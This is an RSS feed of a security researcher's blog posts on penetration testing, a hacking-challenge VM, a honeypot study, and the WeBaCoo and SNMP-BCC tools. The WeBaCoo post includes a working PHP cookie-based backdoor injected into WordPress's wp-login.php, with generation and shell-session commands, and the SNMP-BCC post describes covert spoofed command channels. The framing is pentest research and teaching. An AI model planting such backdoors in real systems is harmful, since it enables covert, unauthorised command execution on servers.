Anestis Bechtsoudis » Work Stuff http://bechtsoudis.com Driven by Passion for Challenges Tue, 01 Jul 2014 12:30:55 +0000 en-US hourly 1 http://wordpress.org/?v=3.9.2 Aiming at Higher Network Security Through Extensive Penetration Tests http://bechtsoudis.com/2012/06/11/aiming-at-higher-network-security-through-extensive-penetration-tests/#utm_source=rss&utm_medium=rss&utm_campaign=aiming-at-higher-network-security-through-extensive-penetration-tests http://bechtsoudis.com/2012/06/11/aiming-at-higher-network-security-through-extensive-penetration-tests/#comments Mon, 11 Jun 2012 09:46:00 +0000 http://bechtsoudis.com/?p=1496  

pp. 1752-1756, IEEE LATIN AMERICA TRANSACTIONS, VOLUME: 10, ISSUE: 3, APRIL 20

Abstract: Modern enterprise infrastructures adopt multilayer network architectures and heterogeneous server environments in order to efficiently fulfill each organization’s goals and objectives. These complex network architectures have resulted in increased demands of information security measures. Each organization needs to effectively deal with this major security concerns, forming a security policy according to its requirements and objectives. An efficient security policy must be proactive in order to provide sufficient defense layers against a variety of known and unknown attack classes and cases. This proactive approach is usually interpreted wrongly in only up-to-date software and hardware. Regular updates are necessary, although, not enough, because potential mis-configurations and design flaws cannot be located and patched, making the whole network vulnerable to attackers. In this paper we present how a comprehensive security level can be reached through extensive Penetration Tests (Ethical Hacking). We present a Penetration Test methodology and framework capable to expose possible exploitable vulnerabilities in every network layer. Additionally, we conducted an extensive analysis of a network penetration test case study against a network simulation lab setup, exposing common network mis-configurations and their security implications to the whole network and its users.

Index Terms:
penetration testing, network security, ethical hacking, proactive security policy

 

Authors:
Anestis Bechtsoudis
Computer Engineering and Informatics Department (CEID)
University of Patras, GREECE
e-mail: abechtsoudis [ at ] ieee.org

Nicolas Sklavos
Informatics & MM Dept., Branch of Pyrgos
Technological Educational Institute of Patras
Pyrgos, ZIP 27100, GREECE
e-mail: nsklavos [ at ] ieee.org

 

Download Full Paper

Download Full Paper (local mirror)

Copyright Notice

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2012/06/11/aiming-at-higher-network-security-through-extensive-penetration-tests/feed/ 5
Drunk Admin Web Hacking Challenge http://bechtsoudis.com/2012/04/02/drunk-admin-web-hacking-challenge/#utm_source=rss&utm_medium=rss&utm_campaign=drunk-admin-web-hacking-challenge http://bechtsoudis.com/2012/04/02/drunk-admin-web-hacking-challenge/#comments Mon, 02 Apr 2012 15:20:33 +0000 http://bechtsoudis.com/?p=1336 Recently I conducted a few keynote talks on the WeBaCoo tool and some web backdoor shell implementation techniques. As a great supporter of practical learning, I designed a relative web hacking challenge that was given to the events attendees after the end of the talk part. The challenge focuses on techniques and methodologies discussed during the talks and implements a slightly restricted web server setup serving a vulnerable image hosting service.

 

Download

The challenge was served on a Debian vmware image which is available for download on the following link:

Download Challenge (539MB) – md5sum:edf9bcd28049ed85312510d5872ea463
Download mirror from boot2root

 

Configuration

The network is configured to obtain an IP address via DHCP by default. Although if you want to further configure the virtual machine you can login as user root and password toor. The apache web server is configured to run on port 8880.

 

Mission

The challenge includes an image hosting web service that has various design vulnerabilities. You must enumerate the various web service features and find an exploitable vulnerability in order to read system hidden files. The web application is 100% custom so do not try to search google for relative PoC exploit code.

FINAL GOAL: Reveal the hidden message for a date arrange that Bob sent to Alice.

 

Work Flow

  1. Enumerate carefully the web application
  2. If you get stuck repeat 1
  3. Try to spawn a web shell or find a way to execute server side code
  4. Read the hidden message

 

Appendix

Congratulations to “Kyriakos Ispoglou (CEID student)” who was the first one that solved 100% the challenge.

Available solution work flows (thanks for sending them):

Extra credits to mr.pr0n for providing a run2shell script exploiting the custom web application to spawn a remote shell with the vulnerable box.

 

If you find a different solving approach (with or without using WeBaCoo) or just solved the challenge and want to disclosure your solution contact me.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2012/04/02/drunk-admin-web-hacking-challenge/feed/ 0
WeBaCoo Tool: Keeping your web shell under the mainstream radars http://bechtsoudis.com/2012/03/21/webacoo-tool-keeping-your-web-shell-under-the-mainstream-radars/#utm_source=rss&utm_medium=rss&utm_campaign=webacoo-tool-keeping-your-web-shell-under-the-mainstream-radars http://bechtsoudis.com/2012/03/21/webacoo-tool-keeping-your-web-shell-under-the-mainstream-radars/#comments Wed, 21 Mar 2012 19:09:29 +0000 http://bechtsoudis.com/?p=1261 The past two weeks I conducted two presentations on the WeBaCoo tool. First one at 3rd unauthorized security meeting (11 March 2012) and the second at Patra’s Linux User Group meetup (20 March 2012).

Presentations did not focus solely on the WeBaCoo tool and its features. Critical topics around web shell implementation and communication techniques were discussed, focusing on how to maintain a stealth behavior. Both events were followed by a custom web hacking challenge for fun and learn.

I had a great time in both events and I would like to thank the organizing committees behind the scenes and people who attended the presentations. It’s pleasant to see that people started to get concern about security issues and actively participate in relevant events.

 

Presentations can be downloaded from the following links:

Unauthorized (.pdf 1.1MB)

PLUG (.pdf 1.1MB)

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2012/03/21/webacoo-tool-keeping-your-web-shell-under-the-mainstream-radars/feed/ 0
Expanding WeBaCoo http://bechtsoudis.com/2012/01/30/expanding-webacoo/#utm_source=rss&utm_medium=rss&utm_campaign=expanding-webacoo http://bechtsoudis.com/2012/01/30/expanding-webacoo/#comments Sun, 29 Jan 2012 22:41:50 +0000 http://bechtsoudis.com/?p=1164 After two months from the initial release, WeBaCoo core communication functions are stable enough to provide a strong base for building some expansion modules. These modules are nothing more than regular actions that pentesters and sysadmins execute while interacting with the system, including database interactions, data file manipulation and more. The concept behind extension modules development, is to provide stealth, stable and highly customizable functionalities within the main terminal mode to assist users. All modules operate under the main WeBaCoo communication function and customize some settings in the target system if it is necessary for the module’s operations.

The extension modules were designed keeping in mind both simplicity and stealth behavior. An extension module that offers large scale functionalities but is capable to expose WeBaCoo by triggering IDS/IPS or application firewalls is not an option. Highly customization levels is an additional goal on the top of the module design hierarchy. The basic module parameters can be given by the user during the module load process within the interaction terminal. Although, experienced users that need to customize some extra parameters can dig into the module’s source code and edit the desired variables as needed. Besides, pentesters preserve a good rumor for their custom tweaking behavior when messing around with open source tools.

For detailed documentation about available extension modules, you can refer to the modules project wiki page.

During the rest of the post three extension modules will be analyzed: mysql-cli, psql-cli and upload.

 

MySQL-CLI

MySQL-CLI was the first module that was developed. It uses the mysql command line utility on the target server to execute mysql commands at the database service (local or remote). When the user loads the mysql-cli module the login credentials are stored in internal variables. During the mysql-cli interaction console, every user given command is packed as an oneliner and executed at the target server returning the relevant output from the database.

 

PSQL-CLI

PSQL-CLI is a module to interact with postgres databases. It uses the target system’s psql command line tool to communicate with postgres databases. The challenge while designing this module was to overcome the authentication interaction process that psql tool uses to login. Unlike mysql tool, psql doesn’t offer a password parameter to avoid the password authentication processes. To overcome this, a .pgpass file is created to the user’s home directory with the login credentials.

 

Upload

Messing around with the offered choices and after many tests, the final decision for the upload module was to use the HTTP POST method to upload files to the target host. A tiny php upload code is temporally placed at the target to serve the upload and then it is deleted. Every local file is uploaded as txt/plaintext to avoid any server side limitations or triggering any protection mechanism. Random strings names are generated to enhance the stealth behavior. When using the upload module it is strongly advised to encrypt or obfuscate the files before upload, to prevent any rule based detection for dangerous system/function names.

 

If you have any further ideas for additional modules contact me.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2012/01/30/expanding-webacoo/feed/ 0
SNMP-BCC — Relay-ing on SNMP for backdoor channel http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/#utm_source=rss&utm_medium=rss&utm_campaign=snmp-bcc-relay-ing-on-snmp-for-backdoor-channel http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/#comments Sun, 15 Jan 2012 00:19:11 +0000 http://bechtsoudis.com/?p=1134 Lately I’m working on an SNMP reflection toolkit to study the effects and impact ratio of SNMP Reflection DoS Attacks. During the development phase I spotted some interesting features at the Request-Reply SNMP working model. More specifically, I noticed that if you send an invalid SNMP OID at a GetRequest message the agent replies with a Response message including an error code and the same invalid OID, as specified in the relevant RFCs. SNMP-BCC (Backdoor Communication Channel) takes advantage of the above SNMP feature combined with IP source spoofing techniques, in order to create a stealth communication channel using the SNMP agent as a relay.

SNMP (Simple Network Management Protocol) is a UDP based protocol used mainly for monitor purposes. Its connectionless UDP nature makes SNMP exposed to IP source spoofing attacks. Although, this does not seem to concern network and system administrators as my pen-test cases reveal. The reason that usually (although wrongly) admins do not bother to secure their agents is the read-only behavior. While SNMP offers both read (get info) and write (set configuration variables) under most infrastructures only the read behavior is implemented serving monitor purposes. This creates a belief to admins that there are not any undergoing security risks shifting the problem to anti-spoofing mechanisms.

While messing around with SNMP functionalities the idea for developing SNMP-BCC was born as a PoC to the above wrong approach of the SNMP setups. SNMP-BCC is capable to create a stealth backdoor communication channel with an “owned” host using an SNMP agent as a relay. Initially the desired to sent data are packed following the ASN.1 OID prototype in an SNMP GetRequest packet. Then the source IP address of the UDP packet is altered to the end client’s IP address. This source spoofed packet is transmitted to the public SNMP agent (community string must be known). Of course the SNMP agent can not locate this invalid OID and replies with an error response for the given OID. This error response containing the unattached initial packed data is finally transferred to the end host. Then the client with the relevant decoder can parse the data.

SNMP-BCC is mainly a post exploitation tool that a pen-tester can use to establish a stealth and hard to detect communication channel with a compromised host. Despite the backdoor communcation purposes someone can use the tool for data leakage and node pivoting purposes. While writing this post, the whole project is in its early stage and I haven’t yet decided if it is worth continuing and if so the working model. Although, I developed and made public SNMP-BCC in order to have feedback from my colleagues and infosec community for the next steps.

SNMP-BCC is written in perl using the raw-sockets library and is available at Github under GPLv3 license. Using ‘snmpbcc.pl’ users can create spoofed SNMP packets with system commands under a user interactive pseudo shell mode. For testing purposes the project also includes the ‘backdoor.pl‘ file that serves as a listener in the end host client. I haven’t implemented a fully ASN.1 decoder at the backdoor code, that’s why the command is wrapped with some special characters (‘#$#’) in order to be easily obtained from the response message.

You can get the latest version of the tool by cloning the repository

git clone git://github.com/anestisb/SNMP-BCC.git

Or by directly downloading the zip project archive

https://github.com/anestisb/SNMP-BCC/zipball/master

Here is a screenshot with SNMP-BCC in action:

 

Your comments are greatly appreciated for tool’s evolution.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/feed/ 8
ICT Security Basics – Demystifying the Sec puzzle http://bechtsoudis.com/2011/11/30/ict-security-basics-demystifying-the-sec-puzzle/#utm_source=rss&utm_medium=rss&utm_campaign=ict-security-basics-demystifying-the-sec-puzzle http://bechtsoudis.com/2011/11/30/ict-security-basics-demystifying-the-sec-puzzle/#comments Wed, 30 Nov 2011 20:24:32 +0000 http://bechtsoudis.com/?p=1007 At 24 November 2011, I was invited to make an introductory presentation about Information and Network Security at 4th Student Guru Patra’s branch meetup. Τhank to Erikos Alkalai for the invitation and congratulations to all the branch support team for their great work.

Knowing that the audience was mainly consisted of undergraduate students attending their first years at university and with no prior contact with information and computer security issues, the presentation focused on the basic theory and some practical issues that a computer engineer must know. The theoretic part was followed by a half-hour live hacking demo, presenting trivial ways followed by an attacker to compromise a main server system.

 

The presentation can be downloaded from here:

Presentation (.pdf 480KB)

 

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/11/30/ict-security-basics-demystifying-the-sec-puzzle/feed/ 0
WeBaCoo (Web Backdoor Cookie) Script-Kit – The Birth http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/#utm_source=rss&utm_medium=rss&utm_campaign=webacoo-web-backdoor-cookie-script-kit-the-birth http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/#comments Tue, 29 Nov 2011 14:48:47 +0000 http://bechtsoudis.com/?p=936 Recently I was messing around with some PHP backdoors capable to provide a “pseudo”-terminal connection with a remote web server injected with a chunk of malicious PHP code. All the existing script and tools (such as weevely, hookworm) send the shell commands hidden in HTTP header fields, although the server’s output is printed out as part of the HTML code. Inspired from the above implementations, I thought why not sending the server’s command output using the HTTP response headers. And under these dark thoughts WeBaCoo (Web Backdoor Cookie) script-kit has been released.

The general concept is pretty simple. Initially the backdoor PHP code is generated using payloads containing main PHP system functions that operate under a basic Cookie handling mechanism. After the code injection the client can send shell commands hidden in Cookie headers obfuscated with base64 encoding. On the server side the shell command is executed and the output is transmitted back to client hidden (base64 encoded too) in Cookie headers.

WeBaCoo is written in perl and is available at github. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

 

Let’s see two case studies in order to present WeBaCoo‘s functionalities. I will use a local burp proxy (127.0.0.1:8080) to inspect the HTTP header cookies.

1. Simple case

The first scenario involves the addition of a new PHP file with the obfuscated backdoor code in the webroot path. After the addition the client can use the termninal mode to execute commands to the server.

Initially let’s create the backdoor file using the ‘shell_exec’ system function:

root@testbed:~# ./webacoo.pl -g -f 2 -o backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "backdoor.php" created.

Then I upload the backdoor.php in the victim server and start a “terminal” connection:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the relative request and response recorded from burp are seen in the following screen-shots:

 

 

 

 

 

 

 

2. Complex case – backdooring wordpress login

WordPress familiar users know that before the login process, the server creates a Test-cookie to examine if broswer has cookies enabled. After that test cookie set I will inject the backdoor code unobfuscated. I create the PHP payload using the ‘passthru’ function and the -r (raw output) flag to get the un-obfuscated code.

root@testbed:~# ./webacoo.pl -g -f 4 -o raw-backdoor.php -r

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "raw-backdoor.php" created.

Then the malicious code is injected under the Test-Cookie set. So the wp-login.php is as follow (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);
 
//My payload
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}
 
// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a “terminal” connection to the infected server to execute my commands:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/wordpress/wp-login.php -p 127.0.0.1:8080

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the relative request and response recorded from burp:

 

 

 

 

 

 

 

 

As you can see the communication data are pretty stealth and will not trigger regular application firewalls and IDS/IPS setups. Although, I will appreciate your feedeback from various tests under your setups to evaluate and evolve WeBaCoo functionalities.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/feed/ 5
Network Penetration Testing http://bechtsoudis.com/2011/11/26/network-penetration-testing/#utm_source=rss&utm_medium=rss&utm_campaign=network-penetration-testing http://bechtsoudis.com/2011/11/26/network-penetration-testing/#comments Fri, 25 Nov 2011 23:21:01 +0000 http://bechtsoudis.com/?p=912 Keynote speaker at Athena Summer School 2011 entitled “Aiming at Higher Network Security Levels through extensive Penetration Testing“. An introductory address highlighting the modern security complexity while focusing on real proactive security policies through penetration tests. The presentation was followed by a live demo hacking Cisco devices in a virtual lab.

 

The presentation can be downloaded from here:

Presentation (.pdf 1.0MB)

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/11/26/network-penetration-testing/feed/ 0
Introduction to Side Channel Attacks http://bechtsoudis.com/2011/03/31/introduction-to-side-channel-attacks/#utm_source=rss&utm_medium=rss&utm_campaign=introduction-to-side-channel-attacks http://bechtsoudis.com/2011/03/31/introduction-to-side-channel-attacks/#comments Thu, 31 Mar 2011 13:12:38 +0000 http://bechtsoudis.com/?p=160 At 30 March 2011, i made an introductory presentation of Side Channel Attacks to the PLUG community. Most PLUG’s members are software designers and they are not familiar with the science of cryptography. Through my presentation i tried to inform them about the side channel leakage that we have when cryptographic primitives are implemented in physical devices (smart card, dedicated hardware etc). After a short introduction to cryptography & cryptanalysis, i presented the Side Channel Attacks classes and some basic attack scenarios. The most important part that i tried to highlight, is that in order to protect from these kind of attacks, software, hardware & protocol designers must work together in order to achieve the best possible results. That’s way it is important for a software designer to have a basic knowledge for this kind of cryptanalytic attacks.

 

The presentation includes:

  1. Introduction to IT state-of-the art and cryptography
  2. Cryptanalysis goals and approaches
  3. Side Channel Attack Scenarios
  4. Software & Hardware countermeasures
  5. End up with some conclusions and highlights

 

The presentation can be downloaded from here:

Presentation (.pdf 643KB)

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/03/31/introduction-to-side-channel-attacks/feed/ 0
Kippo – SSH Honeypot http://bechtsoudis.com/2011/03/27/kippo-ssh-honeypot/#utm_source=rss&utm_medium=rss&utm_campaign=kippo-ssh-honeypot http://bechtsoudis.com/2011/03/27/kippo-ssh-honeypot/#comments Sun, 27 Mar 2011 14:25:04 +0000 http://bechtsoudis.com/?p=97 As part of the network administration in the Network Operation Center (NOC) of the Computer Center Laboratory, we must secure the server & network infrastructure from internal or external malicious activities. Crucial base server & network nodes have been independently secured against the majority of the attacks. But the challenge  is to be able to secure the non-crucial hosts, such as the user’s machines with access to servers and network devices from lower levels of the infrastructure. The obstacle to the whole concept is that we are on an university network, which include people with different levels of computer & IT knowledge, plus the big number of services and experimental technologies that are taking place. So we must implement security countermeasures that are unseen to the end users or simple enough to be adopted by any user into the university infrastructure.

On the of the security forensics approach is: “Allow attacks in a sandbox environment, analyze them and learn from them!“. Following this approach, we have come across with the honeypot mechanisms. Honeypots are mechanisms implemented in the networks that are designed to lure malicious activities in order to analyze them. They have low and easy to bypass security & access, forming a great trap for botnets and inexperienced hackers. The experience level that the attacker should have in order to get trapped in a honeypot host or network, depends on the honeypot’s interaction level and its implemented services. That’s why the honeypots are classified into low and high interaction. With low interaction offering emulated services (limited interaction) and high interaction offering full functionalities.

We have chosen a solution somewhere in the middle of the interaction scale. We were looking for something easy to setup due to our demands and easy to analyze its collection data for analysis. So we choose the Kippo, which is a medium interaction SSH honeypot. Kippo logs ssh bruteforce attacks and offers shell interaction to analyze the executed commands of the attacker. Its features include fake debian 5 based shell, fake filesystem that can be easily altered by the user, saving the wget downloaded files for analysis and UML compatible log files.

On part of our goal has been achieved by analyzing the malicious files that attackers have downloaded from infected web servers. We will continue running Kippo for a short period because we have discovered that moderators of large botnets retain a blacklist where they record IPs of hosts that aren’t real machines (such as honeypots). We come into great surprise when we realize that all the attacks we have recorded so far, were executed by a human and not any botnet script. And the goal of all the attackers was to turn the machine into a scanning zombie that launches bruteforcing attacks over the network. Additionally, most of the attackers tried to run an IRC server in order to mass control their infected hosts. We have recorded their IRC channels and the using code and we will keep an eye on their tactics.

In the near future we plan to establish a higher interaction level honeypot and honeynet, in order to analyze more advanced attacking techniques.

 

Here are some tty sessions of attacking tries that we have recorded from our honeypot, plus a python script that can be used to show the shell interaction from the attack:

Download Logs + PlayScript

 

Additionally with my affiliate John Kalantzis from the UNIX Administration Team we have conducted a presentation in PLUG about SSH Security and the use of Kippo honeypot. The slides from the presentation can be downloaded from here:

Presentation (.pdf 84 kb)

 

The Kippo honeypot project run with the collaboration of John Kalantzis.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/03/27/kippo-ssh-honeypot/feed/ 6